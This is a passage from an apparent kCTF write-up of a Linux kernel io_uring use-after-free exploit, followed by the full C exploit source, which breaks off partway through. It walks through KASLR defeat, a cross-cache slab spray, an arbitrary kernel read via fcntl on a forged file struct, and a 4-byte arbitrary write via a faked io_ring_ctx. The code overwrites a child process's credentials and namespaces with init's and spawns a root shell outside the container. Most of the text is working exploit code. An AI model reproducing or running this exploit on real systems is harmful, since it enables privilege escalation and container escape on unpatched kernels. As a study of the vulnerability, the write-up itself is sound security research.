seemed to be used as an entry point for handling various exceptions and interrupts, so it made sense to me that an offset inside the function, might be found on what I was guessing was an interrupt stack in the cpu_entry_area
. The address was the address of the call sync_regs
portion of the function. I was never able to confirm what types of common exceptions/interrupts wouldβve been taking place on the system that was pushing that address onto the stack presumably when the call
was executed, but maybe someone can chime in and correct me if Iβm wrong about this portion of the exploit. It made sense to me at least and the addressβ presence in the cpu_entry_area
was extremely common to the point that it was never absent during my testing. Armed with a kernel text address at a known offset, we could now defeat KASLR with our arbitrary read. At this point we have the read, the read target, and KASLR defeated.
Again, this portion didnβt take very long to figure out because I had just been introduced to cpu_entry_area
by the aforementioned blogposts at the time.
Where are the Write Gadgets?
I actually struggled to find a satisfactory write gadget for a few days. I was kind of spoiled by my experience finding my arbitrary read gadget and thought this would be a similarly easy search. I followed roughly the same process of going through syscalls which took an fd
as an argument and tracing through them looking for calls to copy_to_user
, but I didnβt have the same luck. During this time, I was discussing the topic with my very talented friend @Firzen14 and he brought up this concept here: https://googleprojectzero.blogspot.com/2022/11/a-very-powerful-clipboard-samsung-in-the-wild-exploit-chain.html#h.yfq0poarwpr9. In the P0 blogpost, they talk about how the signalfd_ctx
of a signalfd
file is stored in the f.file->private_data
field and how the signalfd
syscalls allows the attacker to perform a write of the ctx->sigmask
. So in our situation, since we control the entire fake file contents, forging a fake signalfd_ctx
in memory would be quite easy since we have access to an entire page of memory.
I couldnβt use this technique for my personally imposed challenge though since the technique was already published. But this did open my eyes to the concept of storing contexts and objects in the private_data
field of our struct file
. So at this point, I went hunting for usages of private_data
in the kernel code base. As you can see, the member is used in many many places: https://elixir.bootlin.com/linux/latest/C/ident/private_data.
This was very encouraging to me since I was bound to find some way to achieve an arbitrary write with so many instances of the member being used in so many different code paths; however, I still struggled a while finding a suitable gadget. Finally, I decided to look back at io_uring
itself.
Looking for instances where the file->private_data
was used, I quickly found an instance right in the very function that was related to the bug. In io_msg_ring
, you can see that a target_ctx
of type io_ring_ctx
is derived from the req->file->private
data. Since we control the fake file
, we control can control the private_data
contents (a pointer to a fake io_ring_ctx
in this case).
io_msg_ring
is used to pass data from one io ring to another, and you can see that in io_fill_cqe_aux
, we actually retrieve a io_uring_cqe
struct from our potentially faked io_uring_ctx
via io_get_cqe
. Immediately, we see several WRITE_ONCE
macros used to write data to this object. This was looking extremely promising. I initially was going to use this write as my gadget, but as you will see later, the write sequences and the offsets at which they occur, didnβt really fit my exploitation plan. So for now, weβll find a 2nd write in the same code path.
Immediately after the call to io_fill_cqe_aux
, there is one to io_commit_cqring
using our faked io_uring_ctx
:
static inline void io_commit_cqring(struct io_ring_ctx *ctx)
{
/* order cqe stores with ring update */
smp_store_release(&ctx->rings->cq.tail, ctx->cached_cq_tail);
}
This is basically a memcpy
, we write the contents of ctx->cached_cq_tail
(100% user-controlled) to &ctx->ring->cq.tail
(100% user-controlled). The size of the write in this case is 4 bytes. So we have achieved an arbitrary 4 byte write. From here, it just boils down to what type of exploit you want to write, so I decided to do one I had never done in the spirit of my self-imposed challenge.
Exploitation Plan
Now that we have all the possible tools we could need, it was time to start crafting an exploitation plan. In the kCTF environment you are running as an unprivileged user inside of a container, and your goal is to escape the container and read the flag value from the host file system.
I honestly had no idea where to start in this regard, but luckily there are some good articles out there explaining the situation. This post from Cyberark was extremely helpful in understanding how containerization of a task is achieved in the kernel. And I also got some very helpful pointers from Andy Nguyenβs blog post on his kCTF exploit. Huge thanks to Andy for being one of the few to actually detail their steps for escaping the container.
Finding Init
At this point, my goal is to find the host Init task_struct
in memory and find the value of a few important members: real_cred
, cred
, and nsproxy
. real_cred
is used to track the user and group IDs that were originally responsible for creating the process and unlike cred
, real_cred
remains constant and does not change due to things like setuid
. cred
is used to convey the βeffectiveβ credentials of a task, like the effective user ID for instance. Finally, and super importantly because we are trapped in a container, nsproxy
is a pointer to a struct that contains all of the information about our taskβs namespaces like network, mount, IPC, etc. All of these members are pointers, so if we are able to find their values via our arbitrary read, we should then be able to overwrite our own credentials and namespace in our task_struct
. Luckily, the address of the init
task is a constant offset from the kernel base, so once we broke KASLR with our read of the error_entry
address, we can then copy those values with our arbitrary read capability since they would reside at known addresses (offsets from the init
task symbol).
Forging Objects
With those values in hand, we now need to find our own task_struct
in memory so that we can overwrite our members with those of init
. To do this, I took advantage of the fact that the task_struct
has a linked list of tasks on the system. So early in the exploit, I spawn a child process with a known name, this name fits within the task_struct
comm
field, and so as I traverse through the linked list of tasks on the system, I just simply check each taskβs comm
field for my easily identifiable child process. You can see how I do that in this code snippet:
void traverse_tasks(void)
{
// Process name buf
char current_comm[16] = { 0 };
// Get the next task after init
uint64_t current_next = read_8_at(g_init_task + TASKS_NEXT_OFF);
uint64_t current = current_next - TASKS_NEXT_OFF;
if (!task_valid(current))
{
err("Invalid task after init: 0x%lx", current);
}
// Read the comm
read_comm_at(current + COMM_OFF, current_comm);
//printf(" - Address: 0x%lx, Name: '%s'\n", current, current_comm);
// While we don't have NULL, traverse the list
while (task_valid(current))
{
current_next = read_8_at(current_next);
current = current_next - TASKS_NEXT_OFF;
if (current == g_init_task) { break; }
// Read the comm
read_comm_at(current + COMM_OFF, current_comm);
//printf(" - Address: 0x%lx, Name: '%s'\n", current, current_comm);
// If we find the target comm, save it
if (!strcmp(current_comm, TARGET_TASK))
{
g_target_task = current;
}
// If we find our target comm, save it
if (!strcmp(current_comm, OUR_TASK))
{
g_our_task = current;
}
}
}
You can also see that not only did we find our target task, we also found our own task in memory. This is important for the way I chose to exploit this bug because, remember that we need to fake a few objects in memory, like the io_uring_ctx
for instance. Usually this done by crafting objects in the kernel heap and somehow discoverying their address with a leak. In my case, I have a whole pipe buffer which is 4096 bytes of memory to utilize. The only problem is, I have no idea where it is. But I do know that I have an open file descriptor to it, and I know that each task has a file descriptor table inside of its files
member. After some time printk
some offsets, I was able to traverse through my own taskβs file descriptor table and learn the address of my pipe buffer. This is because the pipe buffer page is obviously page aligned so I can just page align the address we read from the file descriptor table as the address of our UAF file. So now I know exactly in memory where my pipe buffer is, and I also know what offset onto that page our UAF struct file
resides. I have a small helper function to set a βscratch spaceβ region address as a global and then use that memory to set up our fake io_uring_ctx
. You can see those functions here, first finding our pipe buffer address:
void find_pipe_buf_addr(void)
{
// Get the base of the files array
uint64_t files_ptr = read_8_at(g_file_array);
// Adjust the files_ptr to point to our fd in the array
files_ptr += (sizeof(uint64_t) * g_uaf_fd);
// Get the address of our UAF file struct
uint64_t curr_file = read_8_at(files_ptr);
// Calculate the offset
g_off = curr_file & 0xFFF;
// Set the globals
g_file_addr = curr_file;
g_pipe_buf = g_file_addr - g_off;
return;
}
And then determining the location of our scratch space where we will forge the fake io_uring_ctx
:
// Here, all we're doing is determing what side of the page the UAF file is on,
// if its on the front half of the page, the back half is our scratch space
// and vice versa
void set_scratch_space(void)
{
g_scratch = g_pipe_buf;
if (g_off < 0x500) { g_scratch += 0x500; }
}
Now we have one more read to do and this is really just to make the exploit easier. In order to avoid a lot of debugging while triggering my write, I need to make sure that my fake io_uring_ctx
contains as many valid fields as necessary. If you start with a completely NULL
object, you will have to troubleshoot every NULL-deref kernel panic and determine where you went wrong and what kind of value that member should have had. Instead, I chose to copy a legitimate instance of a real io_uring_ctx
instead by reading and copying its contents to a global buffer. Working now from a good base, our forged object can then be set-up properly to perform our arbitrary write from, you can see me using the copy and updating the necessary fields here:
void write_setup_ctx(char *buf, uint32_t what, uint64_t where)
{
// Copy our copied real ring fd
memcpy(&buf[g_off], g_ring_copy, 256);
// Set f->f_count to 1
uint64_t *count = (uint64_t *)&buf[g_off + 0x38];
*count = 1;
// Set f->private_data to our scratch space
uint64_t *private_data = (uint64_t *)&buf[g_off + 0xc8];
*private_data = g_scratch;
// Set ctx->cqe_cached
size_t cqe_cached = g_scratch + 0x240;
cqe_cached &= 0xFFF;
uint64_t *cached_ptr = (uint64_t *)&buf[cqe_cached];
*cached_ptr = NULL_MEM;
// Set ctx->cqe_sentinel
size_t cqe_sentinel = g_scratch + 0x248;
cqe_sentinel &= 0xFFF;
uint64_t *sentinel_ptr = (uint64_t *)&buf[cqe_sentinel];
// We need ctx->cqe_cached < ctx->cqe_sentinel
*sentinel_ptr = NULL_MEM + 1;
// Set ctx->rings so that ctx->rings->cq.tail is written to. That is at
// offset 0xc0 from cq base address
size_t rings = g_scratch + 0x10;
rings &= 0xFFF;
uint64_t *rings_ptr = (uint64_t *)&buf[rings];
*rings_ptr = where - 0xc0;
// Set ctx->cached_cq_tail which is our what
size_t cq_tail = g_scratch + 0x250;
cq_tail &= 0xFFF;
uint32_t *cq_tail_ptr = (uint32_t *)&buf[cq_tail];
*cq_tail_ptr = what;
// Set ctx->cq_wait the list head to itself (so that it's "empty")
size_t real_cq_wait = g_scratch + 0x268;
size_t cq_wait = (real_cq_wait & 0xFFF);
uint64_t *cq_wait_ptr = (uint64_t *)&buf[cq_wait];
*cq_wait_ptr = real_cq_wait;
}
Performing Our Writes
Now, itβs time to do our writes. Remember those three sequential writes we were going to use inside of io_fill_cqe_aux
, but I said they wouldnβt work with the exploit plan? Well the reason was, those three writes were as follows:
cqe = io_get_cqe(ctx);
if (likely(cqe)) {
WRITE_ONCE(cqe->user_data, user_data);
WRITE_ONCE(cqe->res, res);
WRITE_ONCE(cqe->flags, cflags);
They worked really well until I went to overwrite the target nsproxy
member of our target child task_struct
. One of those writes inevitably overwrote the members right next to nsproxy
: signal
and sighand
. This caused big problems for me because as interrupts occurred, those members (pointers) would be derefβd and cause the kernel to panic since they were invalid values. So I opted to just the 4-byte write instead inside io_commit_cqring
. The 4-byte write also caused problems in that at some points current
has itβs creds checked and with what basically amounted to a torn 8-byte write, we would leave current
cred values in invalid states during these checks. This is why I had to use a child process. Huge shoutout to @pqlpql for tipping me off to this.
Now we can just use those same steps to overwrite the three members real_cred
, cred
, and nsproxy
and now our child has all of the same privileges and capabilities including visiblity into the host root file system that init
does. This is perfect, but I still wasnβt able to get the flag!
I started to panic at this point that I had seriously done something wrong. The exploit if FULL of paranoid checks: I reread every overwritten value to make sure itβs correct for instance, so I was confident that I had done the writes properly. It felt like my namespace was somehow not effective yet in the child process, like it was cached somewhere. But then I remembered in Andy Nguyenβs blog post, he used his root
privileges to explictly set his namespace values with calls to setns
. Once I added this step, the child was able to see the root file system and find the flag. Instead of giving my child the same namespaces as init
, I was able to give it the same namespaces of itself lol. I still havenβt followed through on this to determine how setns
is implemented, but this could probably be done without explicit setns
calls and only with our read and write tools:
// Our child waits to be given super powers and then drops into shell
void child_exec(void)
{
// Change our taskname
if (prctl(PR_SET_NAME, TARGET_TASK, NULL, NULL, NULL) != 0)
{
err("`prctl()` failed");
}
while (1)
{
if (*(int *)g_shmem == 0x1337)
{
sleep(3);
info("Child dropping into root shell...");
if (setns(open("/proc/self/ns/mnt", O_RDONLY), 0) == -1) { err("`setns()`"); }
if (setns(open("/proc/self/ns/pid", O_RDONLY), 0) == -1) { err("`setns()`"); }
if (setns(open("/proc/self/ns/net", O_RDONLY), 0) == -1) { err("`setns()`"); }
char *args[] = {"/bin/sh", NULL, NULL};
execve(args[0], args, NULL);
}
else { sleep(2); }
}
}
And finally I was able to drop into a root
shell and capture the flag, escaping the container. One huge obstacle when I tried using my exploit on the Google infrastructure was that their kernel was compiled with SELinux support and my test environment was not. This ended up not being a big deal, I had some out of band confirmation/paranoia checks I had to leave out but fortunately the arbitrary read we used isnβt actually hooked in any way by SELinux unlike most of the other fcntl
syscall flags. At that point remember, we donβt know enough information to fake any objects in memory so Iβd be dead in the water if that read method was ruined by SELinux.
Conclusion
This was a lot of fun for me and I was able to learn a lot. I think these types of learning challenges are great and low-stakes. They can be fun to work on with friends as well, big thanks to everyone mentioned already and also @chompie1337 who had to listen to me freak out about not being able to read the flag once I had overwritten my creds. The exploit is posted below in full, let me know if you have any trouble understanding any of it, thanks.
// Compile
// gcc sploit.c -o sploit -l:liburing.a -static -Wall
#define _GNU_SOURCE
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <stdarg.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/msg.h>
#include <sys/timerfd.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include "liburing.h"
// /sys/kernel/slab/filp/objs_per_slab
#define OBJS_PER_SLAB 16UL
// /sys/kernel/slab/filp/cpu_partial
#define CPU_PARTIAL 52UL
// Multiplier for cross-cache arithmetic
#define OVERFLOW_FACTOR 2UL
// Largest number of objects we could allocate per Cross-cache step
#define CROSS_CACHE_MAX 8192UL
// Fixed mapping in cpu_entry_area whose contents is NULL
#define NULL_MEM 0xfffffe0000002000UL
// Reading side of pipe
#define PIPE_READ 0
// Writing side of pipe
#define PIPE_WRITE 1
// error_entry inside cpu_entry_area pointer
#define ERROR_ENTRY_ADDR 0xfffffe0000002f48UL
// Offset from `error_entry` pointer to kernel base
#define EE_OFF 0xe0124dUL
// Kernel text signature
#define KERNEL_SIGNATURE 0x4801803f51258d48UL
// Offset from kernel base to init_task
#define INIT_OFF 0x18149c0UL
// Offset from task to task->comm
#define COMM_OFF 0x738UL
// Offset from task to task->real_cred
#define REAL_CRED_OFF 0x720UL
// Offset from task to task->cred
#define CRED_OFF 0x728UL
// Offset from task to task->nsproxy
#define NSPROXY_OFF 0x780UL
// Offset from task to task->files
#define FILES_OFF 0x770UL
// Offset from task->files to &task->files->fdt
#define FDT_OFF 0x20UL
// Offset from &task->files->fdt to &task->files->fdt->fd
#define FD_ARRAY_OFF 0x8UL
// Offset from task to task->tasks.next
#define TASKS_NEXT_OFF 0x458UL
// Process name to give root creds to
#define TARGET_TASK "blegh2"
// Our process name
#define OUR_TASK "blegh1"
// Offset from kernel base to io_uring_fops
#define FOPS_OFF 0x1220200UL
// Shared memory with child
void *g_shmem;
// Child pid
pid_t g_child = -1;
// io_uring instance to use
struct io_uring g_ring = { 0 };
// UAF file handle
int g_uaf_fd = -1;
// Track pipes
struct fd_pair {
int fd[2];
};
struct fd_pair g_pipe = { 0 };
// The offset on the page where our `file` is
size_t g_off = 0;
// Our fake file that is a copy of a legit io_uring fd
unsigned char g_ring_copy[256] = { 0 };
// Keep track of files added in Cross-cache steps
int g_cc1_fds[CROSS_CACHE_MAX] = { 0 };
size_t g_cc1_num = 0;
int g_cc2_fds[CROSS_CACHE_MAX] = { 0 };
size_t g_cc2_num = 0;
int g_cc3_fds[CROSS_CACHE_MAX] = { 0 };
size_t g_cc3_num = 0;
// Gadgets and offsets
uint64_t g_kern_base = 0;
uint64_t g_init_task = 0;
uint64_t g_target_task = 0;
uint64_t g_our_task = 0;
uint64_t g_cred_what = 0;
uint64_t g_nsproxy_what = 0;
uint64_t g_cred_where = 0;
uint64_t g_real_cred_where = 0;
uint64_t g_nsproxy_where = 0;
uint64_t g_files = 0;
uint64_t g_fdt = 0;
uint64_t g_file_array = 0;
uint64_t g_file_addr = 0;
uint64_t g_pipe_buf = 0;
uint64_t g_scratch = 0;
uint64_t g_fops = 0;
void err(const char* format, ...)
{
if (!format) {
exit(EXIT_FAILURE);
}
fprintf(stderr, "%s", "[!] ");
va_list args;
va_start(args, format);
vfprintf(stderr, format, args);
va_end(args);
fprintf(stderr, ": %s\n", strerror(errno));
sleep(5);
exit(EXIT_FAILURE);
}
void info(const char* format, ...)
{
if (!format) {
return;
}
fprintf(stderr, "%s", "[*] ");
va_list args;
va_start(args, format);
vfprintf(stderr, format, args);
va_end(args);
fprintf(stderr, "%s", "\n");
}
// Get FD for test file
int get_test_fd(int victim)
{
// These are just different for kernel debugging purposes
char *file = NULL;
if (victim) { file = "/etc//passwd"; }
else { file = "/etc/passwd"; }
int fd = open(file, O_RDONLY);
if (fd < 0)
{
err("`open()` failed, file: %s", file);
}
return fd;
}
// Set-up the file that we're going to use as our victim object
void alloc_victim_filp(void)
{
// Open file to register
g_uaf_fd = get_test_fd(1);
info("Victim fd: %d", g_uaf_fd);
// Register the file
int ret = io_uring_register_files(&g_ring, &g_uaf_fd, 1);
if (ret)
{
err("`io_uring_register_files()` failed");
}
// Get hold of the sqe
struct io_uring_sqe *sqe = NULL;
sqe = io_uring_get_sqe(&g_ring);
if (!sqe)
{
err("`io_uring_get_sqe()` failed");
}
// Init sqe vals
sqe->opcode = IORING_OP_MSG_RING;
sqe->fd = 0;
sqe->flags |= IOSQE_FIXED_FILE;
ret = io_uring_submit(&g_ring);
if (ret < 0)
{
err("`io_uring_submit()` failed");
}
struct io_uring_cqe *cqe;
ret = io_uring_wait_cqe(&g_ring, &cqe);
}
// Set CPU affinity for calling process/thread
void pin_cpu(long cpu_id)
{
cpu_set_t mask;
CPU_ZERO(&mask);
CPU_SET(cpu_id, &mask);
if (sched_setaffinity(0, sizeof(mask), &mask) == -1)
{
err("`sched_setaffinity()` failed: %s", strerror(errno));
}
return;
}
// Increase the number of FDs we can have open
void increase_fds(void)
{
struct rlimit old_lim, lim;
if (getrlimit(RLIMIT_NOFILE, &old_lim) != 0)
{
err("`getrlimit()` failed: %s", strerror(errno));
}
lim.rlim_cur = old_lim.rlim_max;
lim.rlim_max = old_lim.rlim_max;
if (setrlimit(RLIMIT_NOFILE, &lim) != 0)
{
err("`setrlimit()` failed: %s", strerror(errno));
}
info("Increased fd limit from %d to %d", old_lim.rlim_cur, lim.rlim_cur);
return;
}
void create_pipe(void)
{
if (pipe(g_pipe.fd) == -1)
{
err("`pipe()` failed");
}
}
void release_pipe(void)
{
close(g_pipe.fd[PIPE_WRITE]);
close(g_pipe.fd[PIPE_READ]);
}
// Our child waits to be given super powers and then drops into shell
void child_exec(void)
{
// Change our taskname
if (prctl(PR_SET_NAME, TARGET_TASK, NULL, NULL, NULL) != 0)
{
err("`prctl()` failed");
}
while (1)
{
if (*(int *)g_shmem == 0x1337)
{
sleep(3);
info("Child dropping into root shell...");
if (setns(open("/proc/self/ns/mnt", O_RDONLY), 0) == -1) { err("`setns()`"); }
if (setns(open("/proc/self/ns/pid", O_RDONLY), 0) == -1) { err("`setns()`"); }
if (setns(open("/proc/self/ns/net", O_RDONLY), 0) == -1) { err("`setns()`"); }
char *args[] = {"/bin/sh", NULL, NULL};
execve(args[0], args, NULL);
}
else { sleep(2); }
}
}
// Set-up environment for exploit
void setup_env(void)
{
// Make sure a page is a page and we're not on some bullshit machine
long page_sz = sysconf(_SC_PAGESIZE);
if (page_sz != 4096L)
{
err("Page size was: %ld", page_sz);
}
// Pin to CPU 0
pin_cpu(0);
info("Pinned process to core-0");
// Increase FD limit
increase_fds();
// Create shared mem
g_shmem = mmap(
(void *)0x1337000,
page_sz,
PROT_READ | PROT_WRITE,
MAP_ANONYMOUS | MAP_FIXED | MAP_SHARED,
-1,
0
);
if (g_shmem == MAP_FAILED) { err("`mmap()` failed"); }
info("Shared memory @ 0x%lx", g_shmem);
// Create child
g_child = fork();
if (g_child == -1)
{
err("`fork()` failed");
}
// Child
if (g_child == 0)
{
child_exec();
}
info("Spawned child: %d", g_child);
// Change our name
if (prctl(PR_SET_NAME, OUR_TASK, NULL, NULL, NULL) != 0)
{
err("`prctl()` failed");
}
// Create io ring
struct io_uring_params params = { 0 };
if (io_uring_queue_init_params(8, &g_ring, ¶ms))
{
err("`io_uring_queue_init_params()` failed");
}
info("Created io_uring");
// Create pipe
info("Creating pipe...");
create_pipe();
}
// Decrement file->f_count to 0 and free the filp
void do_uaf(void)
{
if (io_uring_unregister_files(&g_ring))
{
err("`io_uring_unregister_files()` failed");
}
// Let the free actually happen
usleep(100000);
}
// Cross-cache 1:
// Allocate enough objects that we have definitely allocated enough
// slabs to fill up the partial list later when we free an object from each
// slab
void cc_1(void)
{
// Calculate the amount of objects to spray
uint64_t spray_amt = (OBJS_PER_SLAB * (CPU_PARTIAL + 1)) * OVERFLOW_FACTOR;
g_cc1_num = spray_amt;
// Paranoid
if (spray_amt > CROSS_CACHE_MAX) { err("Illegal spray amount"); }
//info("Spraying %lu `filp` objects...", spray_amt);
for (uint64_t i = 0; i < spray_amt; i++)
{
g_cc1_fds[i] = get_test_fd(0);
}
usleep(100000);
return;
}
// Cross-cache 2:
// Allocate OBJS_PER_SLAB to *probably* create a new active slab
void cc_2(void)
{
// Step 2:
// Allocate OBJS_PER_SLAB to *probably* create a new active slab
uint64_t spray_amt = OBJS_PER_SLAB - 1;
g_cc2_num = spray_amt;
//info("Spraying %lu `filp` objects...", spray_amt);
for (uint64_t i = 0; i < spray_amt; i++)
{
g_cc2_fds[i] = get_test_fd(0);
}
usleep(100000);
return;
}
// Cross-cache 3:
// Allocate enough objects to definitely fill the rest of the active slab
// and start a new active slab
void cc_3(void)
{
uint64_t spray_amt = OBJS_PER_SLAB + 1;
g_cc3_num = spray_amt;
//info("Spraying %lu `filp` objects...", spray_amt);
for (uint64_t i = 0; i < spray_amt; i++)
{
g_cc3_fds[i] = get_test_fd(0);
}
usleep(100000);
return;
}
// Cross-cache 4:
// Free all the filps from steps 2, and 3. This will place our victim
// page in the partial list completely empty
void cc_4(void)
{
//info("Freeing `filp` objects from CC2 and CC3...");
for (size_t i = 0; i < g_cc2_num; i++)
{
close(g_cc2_fds[i]);
}
for (size_t i = 0; i < g_cc3_num; i++)
{
close(g_cc3_fds[i]);
}
usleep(100000);
return;
}
// Cross-cache 5:
// Free an object for each slab we allocated in Step 1 to overflow the
// partial list and get our empty slab in the partial list freed
void cc_5(void)
{
//info("Freeing `filp` objects to overflow CPU partial list...");
for (size_t i = 0; i < g_cc1_num; i++)
{
if (i % OBJS_PER_SLAB == 0)
{
close(g_cc1_fds[i]);
}
}
usleep(100000);
return;
}
// Reset all state associated with a cross-cache attempt
void cc_reset(void)
{
// Close all the remaining FDs
info("Resetting cross-cache state...");
for (size_t i = 0; i < CROSS_CACHE_MAX; i++)
{
close(g_cc1_fds[i]);
close(g_cc2_fds[i]);
close(g_cc3_fds[i]);
}
// Reset number trackers
g_cc1_num = 0;
g_cc2_num = 0;
g_cc3_num = 0;
}
// Do cross cache process
void do_cc(void)
{
// Start cross-cache process
cc_1();
cc_2();
// Allocate the victim filp
alloc_victim_filp();
// Free the victim filp
do_uaf();
// Resume cross-cache process
cc_3();
cc_4();
cc_5();
// Allow pages to be freed
usleep(100000);
}
void reset_pipe_buf(void)
{
char buf[4096] = { 0 };
read(g_pipe.fd[PIPE_READ], buf, 4096);
}
void zero_pipe_buf(void)
{
char buf[4096] = { 0 };
write(g_pipe.fd[PIPE_WRITE], buf, 4096);
}
// Offset inside of inode to inode->i_write_hint
#define HINT_OFF 0x8fUL
// By using `fcntl(F_GET_RW_HINT)` we can read a single byte at
// file->inode->i_write_hint
uint64_t read_8_at(unsigned long addr)
{
// Set the inode address
uint64_t inode_addr_base = addr - HINT_OFF;
// Set up the buffer for the arbitrary read
unsigned char buf[4096] = { 0 };
// Iterate 8 times to read 8 bytes
uint64_t val = 0;
for (size_t i = 0; i < 8; i++)
{
// Calculate inode address
uint64_t target = inode_addr_base + i;
// Set up a fake file 16 times (number of files per page), we don't know
// yet which of the 16 slots our UAF file is at
reset_pipe_buf();
*(uint64_t *)&buf[0x20] = target;
*(uint64_t *)&buf[0x120] = target;
*(uint64_t *)&buf[0x220] = target;
*(uint64_t *)&buf[0x320] = target;
*(uint64_t *)&buf[0x420] = target;
*(uint64_t *)&buf[0x520] = target;
*(uint64_t *)&buf[0x620] = target;
*(uint64_t *)&buf[0x720] = target;
*(uint64_t *)&buf[0x820] = target;
*(uint64_t *)&buf[0x920] = target;
*(uint64_t *)&buf[0xa20] = target;
*(uint64_t *)&buf[0xb20] = target;
*(uint64_t *)&buf[0xc20] = target;
*(uint64_t *)&buf[0xd20] = target;
*(uint64_t *)&buf[0xe20] = target;
*(uint64_t *)&buf[0xf20] = target;
// Create the content
write(g_pipe.fd[PIPE_WRITE], buf, 4096);
// Read one byte back
uint64_t arg = 0;
if (fcntl(g_uaf_fd, F_GET_RW_HINT, &arg) == -1)
{
err("`fcntl()` failed");
};
// Add to val
val |= (arg << (i * 8));
}
return val;
}
void read_comm_at(unsigned long addr, char *comm)
{
// Set the inode address
uint64_t inode_addr_base = addr - HINT_OFF;
// Set up the buffer for the arbitrary read
unsigned char buf[4096] = { 0 };
// Iterate 15 times to read 15 bytes
for (size_t i = 0; i < 8; i++)
{
// Calculate inode address
uint64_t target = inode_addr_base + i;
// Set up a fake file 16 times (number of files per page), we don't know
// yet which of the 16 slots our UAF file is at
reset_pipe_buf();
*(uint64_t *)&buf[0x20] = target;
*(uint64_t *)&buf[0x120] = target;
*(uint64_t *)&buf[0x220] = target;
*(uint64_t *)&buf[0x320] = target;
*(uint64_t *)&buf[0x420] = target;
*(uint64_t *)&buf[0x520] = target;
*(uint64_t *)&buf[0x620] = target;
*(uint64_t *)&buf[0x720] = target;
*(uint64_t *)&buf[0x820] = target;
*(uint64_t *)&buf[0x920] = target;
*(uint64_t *)&buf[0xa20] = target;
*(uint64_t *)&buf[0xb20] = target;
*(uint64_t *)&buf[0xc20] = target;
*(uint64_t *)&buf[0xd20] = target;
*(uint64_t *)&buf[0xe20] = target;
*(uint64_t *)&buf[0xf20] = target;
// Create the content
write(g_pipe.fd[PIPE_WRITE], buf, 4096);
// Read one byte back
uint64_t arg = 0;
if (fcntl(g_uaf_fd, F_GET_RW_HINT, &arg) == -1)
{
err("`fcntl()` failed");
};
// Add to comm buf
comm[i] = arg;
}
}
void write_setup_ctx(char *buf, uint32_t what, uint64_t where)
{
// Copy our copied real ring fd
memcpy(&buf[g_off], g_ring_copy, 256);
// Set f->f_count to 1
uint64_t *count = (uint64_t *)&buf[g_off + 0x38];
*count = 1;
// Set f->private_data to our scratch space
uint64_t *private_data = (uint64_t *)&buf[g_off + 0xc8];
*private_data = g_scratch;
// Set ctx->cqe_cached
size_t cqe_cached = g_scratch + 0x240;
cqe_cached &= 0xFFF;
uint64_t *cached_ptr = (uint64_t *)&buf[cqe_cached];
*cached_ptr = NULL_MEM;
// Set ctx->cqe_sentinel
size_t cqe_sentinel = g_scratch + 0x248;
cqe_sentinel &= 0xFFF;
uint64_t *sentinel_ptr = (uint64_t *)&buf[cqe_sentinel];
// We need ctx->cqe_cached < ctx->cqe_sentinel
*sentinel_ptr = NULL_MEM + 1;
// Set ctx->rings so that ctx->rings->cq.tail is written to. That is at
// offset 0xc0 from cq base address
size_t rings = g_scratch + 0x10;
rings &= 0xFFF;
uint64_t *rings_ptr = (uint64_t *)&buf[rings];
*rings_ptr = where - 0xc0;
// Set ctx->cached_cq_tail which is our what
size_t cq_tail = g_scratch + 0x250;
cq_tail &= 0xFFF;
uint32_t *cq_tail_ptr = (uint32_t *)&buf[cq_tail];
*cq_tail_ptr = what;
// Set ctx->cq_wait the list head to itself (so that it's "empty")
size_t real_cq_wait = g_scratch + 0x268;
size_t cq_wait = (real_cq_wait & 0xFFF);
uint64_t *cq_wait_ptr = (uint64_t *)&buf[cq_wait];
*cq_wait_ptr = real_cq_wait;
}
void write_what_where(uint32_t what, uint64_t where)
{
// Reset the page contents
reset_pipe_buf();
// Setup the fake file target ctx
char buf[4096] = { 0 };
write_setup_ctx(buf, what, where);
// Set contents
write(g_pipe.fd[PIPE_WRITE], buf, 4096);
// Get an sqe
struct io_uring_sqe *sqe = NULL;
sqe = io_uring_get_sqe(&g_ring);
if (!sqe)
{
err("`io_uring_get_sqe()` failed");
}
// Set values
sqe->opcode = IORING_OP_MSG_RING;
sqe->fd = g_uaf_fd;
int ret = io_uring_submit(&g_ring);
if (ret < 0)
{
err("`io_uring_submit()` failed");
}
// Wait for the completion
struct io_uring_cqe *cqe;
ret = io_uring_wait_cqe(&g_ring, &cqe);
}
// So in this kernel code path, after we're done with our write-what-where, the
// what value actually gets incremented ++ style, so we have to decrement
// the values by one each time.
// Also, we only have a 4 byte write ability so we have to split up the 8 bytes
// into 2 separate writes
void overwrite_cred(void)
{
uint32_t val_1 = g_cred_what & 0xFFFFFFFF;
uint32_t val_2 = (g_cred_what >> 32) & 0xFFFFFFFF;
write_what_where(val_1 - 1, g_cred_where);
write_what_where(val_2 - 1, g_cred_where + 0x4);
}
void overwrite_real_cred(void)
{
uint32_t val_1 = g_cred_what & 0xFFFFFFFF;
uint32_t val_2 = (g_cred_what >> 32) & 0xFFFFFFFF;
write_what_where(val_1 - 1, g_real_cred_where);
write_what_where(val_2 - 1, g_real_cred_where + 0x4);
}
void overwrite_nsproxy(void)
{
uint32_t val_1 = g_nsproxy_what & 0xFFFFFFFF;
uint32_t val_2 = (g_nsproxy_what >> 32) & 0xFFFFFFFF;
write_what_where(val_1 - 1, g_nsproxy_where);
write_what_where(val_2 - 1, g_nsproxy_where + 0x4);
}
// Try to fuzzily validate leaked task addresses lol
int task_valid(uint64_t task)
{
if ((uint16_t)(task >> 48) == 0xFFFF) { return 1; }
else { return 0; }
}
void traverse_tasks(void)
{
// Process name buf
char current_comm[16] = { 0 };
// Get the next task after init
uint64_t current_next = read_8_at(g_init_task + TASKS_NEXT_OFF);
uint64_t current = current_next - TASKS_NEXT_OFF;
if (!task_valid(current))
{
err("Invalid task after init: 0x%lx", current);
}
// Read the comm
read_comm_at(current + COMM_OFF, current_comm);
//printf(" - Address: 0x%lx, Name: '%s'\n", current, current_comm);
// While we don't have NULL, traverse the list
while (task_valid(current))
{
current_next = read_8_at(current_next);
current = current_next - TASKS_NEXT_OFF;
if (current == g_init_task) { break; }
// Read the comm
read_comm_at(current + COMM_OFF, current_comm);
//printf(" - Address: 0x%lx, Name: '%s'\n", current, current_comm);
// If we find the target comm, save it
if (!strcmp(current_comm, TARGET_TASK))
{
g_target_task = current;
}
// If we find our target comm, save it
if (!strcmp(current_comm, OUR_TASK))
{
g_our_task = current;
}
}
}
void find_pipe_buf_addr(void)
{
// Get the base of the files array
